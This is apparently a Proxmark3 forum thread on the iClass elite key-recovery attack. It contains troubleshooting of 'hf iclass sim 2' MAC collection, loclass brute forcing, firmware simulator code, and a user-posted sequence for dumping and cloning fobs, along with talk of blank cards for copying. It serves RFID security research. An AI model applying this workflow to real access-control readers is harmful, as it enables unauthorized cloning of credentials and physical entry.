Research, development and trades concerning the powerful Proxmark3 device.
I checked the code and I think my 'fix' does not work because I need to fill the 'emulator' table:
    } else if ((simulationMode == MODE_FULLSIM || simulationMode == MODE_EXIT_AFTER_MAC)
               && receivedCmd[0] == ICLASS_CMD_READ_OR_IDENTIFY && len == 4) {
        // Read block
        uint16_t blk = receivedCmd[1];
        // Take the data...
        memcpy(data_generic_trace, emulator + (blk << 3), 8);
        // Add crc
PM3 needs to respond to "Unknown command (len=4): c 5 de 64", so what should I put in sector 5 (this is attack mode 2, so I don't have any card dump yet)?
-- update --
I found at http://martin.swende.se/blog/Elite-Hacking.html that sector 5 is the "Application Issuer Area" (publicly readable).
Should I read it from the card or rather use some generic value for the 'sim 2' attack, like this?
#db# 05: ff ff ff ff ff ff ff ff
Last edited by Piorun (2015-11-14 19:31:58)
I read the forum about the HID iClass decoding and understand we need the master key to read and write the iClass fob.
My question is:
What kind of blank card or fob is needed to copy the iClass 2k fob?
Thanks in advance.
> I read the forum about the HID iClass decoding and understand we need the master key to read and write the iClass fob.
> My question is:
> What kind of blank card or fob is needed to copy the iClass 2k fob? Thanks in advance.
You need good quality picopass cards.
> You need good quality picopass cards.
Is this the type of fob (picopass) you are talking about?
Last edited by Lenox (2015-11-23 02:25:27)
> PM3 needs to respond to "Unknown command (len=4): c 5 de 64", so what should I put in sector 5 (this is attack mode 2, so I don't have any card dump yet)?
> -- update --
> I found at http://martin.swende.se/blog/Elite-Hacking.html that sector 5 is the "Application Issuer Area" (publicly readable).
> Should I read it from the card or rather use some generic value for the 'sim 2' attack, like this?
> #db# 05: ff ff ff ff ff ff ff ff
I tried to run "hf iclass sim 2" on a reader (RP40 SE) and get "Unknown command received from reader (len=4)".
I am using the latest 2.5.0.
Following the page: http://martin.swende.se/blog/PM3-development.html
I also got the following result:
proxmark3> hf iclass sim 2
#db# Going into attack mode, 15 CSNS sent
#db# Simulating CSN 000b0ffff7ff12e0
Waiting for a response from the proxmark...
Don't forget to cancel its operation first by pressing on the button
#db# Unknown command received from reader (len=4): c 1 fa 22 ff fe 5f 2 1c
#db# Unknown command received from reader (len=4): c 1 fa 22 ff fe 5f 2 1c
Tried with pm3-bin-2.5.0.
I also followed the instructions from http://martin.swende.se/blog/PM3-development.html
After issuing the command "hf iclass sim 2", nothing happened on my PM3. I waited for a minute or two, then pressed the button and received this message:
#db# Going into attack mode, 15 CSNS sent
#db# Simulating CSN 000b0ffff7ff12e0
Waiting for a response from the proxmark...
Don't forget to cancel its operation first by pressing on the button
#db# Button pressed
Mac responses: 0 MACs obtained (should be 15)
Saved data to 'iclass_mac_attack-2.bin'
proxmark3>
Is this right? Would "hf iclass sim 2" work with standard iClass cards (not elite)?
Dead topic. Haha. So is anyone working on iClass elite now?
I have all the things needed as said in this topic: Omnikey, iClass SE reader, PM3, working iClass cards, rewritable blank iClass cards. I got a lot of data collected from my country itself.
So guys, let's do this?
>So is anyone working on Iclass elite now ?
iClass elite was done a long time ago.
I've not been active here for a while, but regarding "Unknown command": that's really a misnomer. The protocol handler for iclass expects a few different packets; when something else arrives which it does not handle, it prints that. It should instead say "Unhandled command" or "Not implemented command". So to anyone with problems: after a failure, do a 'hf iclass list', which will print out the commands and responses.
To be clear: the protocol printout _may_ contain partial or full information to reverse the key. But since it failed (0 MACs obtained), probably not. Without that trace, it's very difficult to know what failed.
I did the 'fix':
    if ((simulationMode == MODE_FULLSIM || simulationMode == MODE_EXIT_AFTER_MAC)
        && receivedCmd[0] == ICLASS_CMD_READ_OR_IDENTIFY && len == 4) {
and can obtain 15 MACs:
proxmark3> hf icla sim 2
#db# Going into attack mode, 15 CSNS sent
#db# Simulating CSN 000b0ffff7ff12e0
Waiting for a response from the proxmark...
Don't forget to cancel its operation first by pressing on the button
#db# CSN: 00 0b 0f ff f7 ff 12 e0
#db# RDR: (len=09): 05 cf 57 30 21 5f xx xx xx
#db# Simulating CSN 00040e08f7ff12e0
#db# CSN: 00 04 0e 08 f7 ff 12 e0
#db# RDR: (len=09): 05 6f f0 ee f8 24 xx xx xx
...
#db# Simulating CSN 00050121f7ff12e0
#db# CSN: 00 05 01 21 f7 ff 12 e0
#db# RDR: (len=09): 05 9f 65 d0 03 8e xx xx xx
#db# Done...
Mac responses: 15 MACs obtained (should be 15)
Saved data to 'iclass_mac_attack-1.bin'
proxmark3>
However, the brute force attack doesn't work:
proxmark3> hf iclass loclass f iclass_mac_attack-2.bin
Bruteforcing byte 1
Bruteforcing byte 0
Bruteforcing byte 69 1234567891011 ... 42452462472482492502512522532542550
Failed to recover 3 bytes using the following CSN
CSN = 000b0ffff7ff12e0
The CSN requires > 3 byte bruteforce, not supported
CSN = 00040e08f7ff12e0
HASH1 = 7802000045014545
The CSN requires > 3 byte bruteforce, not supported
CSN = 00090d05f7ff12e0
HASH1 = 7b0300004501xxxx
The bruteforcer expects a certain format on the save-file, don't remember offhand, but it includes the malicious CSNs used. It then calculates the bruteforce based on those. Have you used a different set of MACs than the ordinary attack-MACs? Because '00040e08f7ff12e0' is not one of the original CSNs, it seems.
[EDIT] Sorry, my bad; https://github.com/Proxmark/proxmark3/blob/master/client/cmdhficlass.c#L120 it actually is. Are you sure it's an elite and not a standard?
'hf iclass sim 2' <- attack reader, get dump
Got the file iclass_mac_attack-1.bin
Mac responses: 0 MACs obtained (should be 15)
Got this. I do not know whether this is right or wrong.
'hf iclass loclass f <file>' <- bruteforce dump
hf iclass loclass t - got the key.
hf iclass loclass f - take like ages
'hf iclass dump <key> e' <- dump tag with elite key <key>
hf iclass dump f [FILE ?] k [KEY ?] [CSN ?] [CC ?] e/r ?
'hf iclass eload <dumpfile>' <- load data into pm3
Have not gone into this step yet.
'hf iclass sim 3' <-- full simulation of the dumped tag.
Have not gone into this step yet.
Hopefully I am on the right track. Can someone validate it?
I believe that the len=4 command 0x0C is a read or identify; we have to reply with ACSN.
As in c 1 fa 22 ff fe 5f 2 1c => c 1 fa 22 is the actual data from the reader:
the reader sent a read command (0x0C) requesting block 1.
Last edited by Go_tus (2016-06-14 08:30:01)
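Putting Go_tus's reading of the frame together with the simulator branch Piorun quoted at the top of the thread, here is an added example (written for this page, not code from the thread or from the Proxmark3 firmware) that validates a len=4 reader frame such as "c 5 de 64", pulls out the block number and builds the 8-byte-plus-CRC answer the simulator has to send back. The CRC parameters (reflected 0x8408, preset 0xE012, CRC over the block byte only) are assumed from how the firmware's AppendCrc is used; they reproduce the "de 64" and "fa 22" bytes seen in the traces above, and the emulator memory is constructed.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define ICLASS_CMD_READ_OR_IDENTIFY 0x0C   /* the "c" at the start of the traced frame */
#define CRC_ICLASS 0xE012                  /* CRC preset assumed for the firmware's AppendCrc */
/* Reflected CRC-16 (poly 0x8408) seeded with the iClass preset, no final XOR.
 * The low byte goes on the wire first, so a traced "fa 22" is crc == 0x22fa. */
static uint16_t iclass_crc16(const uint8_t *d, size_t n) {
    uint16_t crc = CRC_ICLASS;
    for (size_t i = 0; i < n; i++) {
        crc ^= d[i];
        for (int b = 0; b < 8; b++)
            crc = (crc & 1) ? (crc >> 1) ^ 0x8408 : crc >> 1;
    }
    return crc;
}
/* Decode a len=4 reader frame "0c <blk> <crc_lo> <crc_hi>"; the CRC covers only the
 * block byte. Returns the block number, or -1 if this is not a well-formed read. */
static int iclass_parse_read(const uint8_t *cmd, size_t len) {
    if (len != 4 || cmd[0] != ICLASS_CMD_READ_OR_IDENTIFY) return -1;
    uint16_t crc = iclass_crc16(&cmd[1], 1);
    if (cmd[2] != (crc & 0xFF) || cmd[3] != (crc >> 8)) return -1;
    return cmd[1];
}
/* Build the 10-byte tag answer the simulator branch must send: the 8 bytes of block
 * blk from emulator memory (offset blk << 3, as in the firmware) followed by the CRC. */
static size_t iclass_build_read_answer(const uint8_t *emulator, uint8_t blk, uint8_t out[10]) {
    memcpy(out, emulator + (blk << 3), 8);
    uint16_t crc = iclass_crc16(out, 8);
    out[8] = crc & 0xFF; out[9] = crc >> 8;
    return 10;
}

int main(void) {
    /* Constructed emulator memory: 8 blocks of 8 bytes, block 5 (Application Issuer
     * Area) filled with ff as in the "#db# 05: ff ff ff ff ff ff ff ff" line above. */
    uint8_t emulator[8 * 8] = {0};
    memset(emulator + 5 * 8, 0xff, 8);
    const uint8_t read_aa[4] = { 0x0c, 0x05, 0xde, 0x64 };   /* "c 5 de 64" from the thread */
    uint8_t answer[10];
    int blk = iclass_parse_read(read_aa, sizeof read_aa);
    if (blk < 0) return 1;
    size_t n = iclass_build_read_answer(emulator, (uint8_t)blk, answer);
    printf("read block %d -> tag answer:", blk);
    for (size_t i = 0; i < n; i++) printf(" %02x", answer[i]);
    putchar('\n');
    return 0;
}
```

A frame whose CRC does not check out (a bit flipped by noise, or a command the handler was never written for) is rejected before any emulator memory is touched, which is the check the original "Unknown command" path was silently skipping.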
EDIT - started a new thread as advised.
Last edited by w32.n01 (2016-08-31 16:38:29)
I suggest you start a new thread instead.
I am also getting the same when running hf iclass sim 2:
proxmark3> hf iclass sim 2
#db# Going into attack mode, 15 CSNS sent
#db# Simulating CSN 000b0ffff7ff12e0
Waiting for a response from the proxmark...
Don't forget to cancel its operation first by pressing on the button
#db# Button pressed
Mac responses: 0 MACs obtained (should be 15)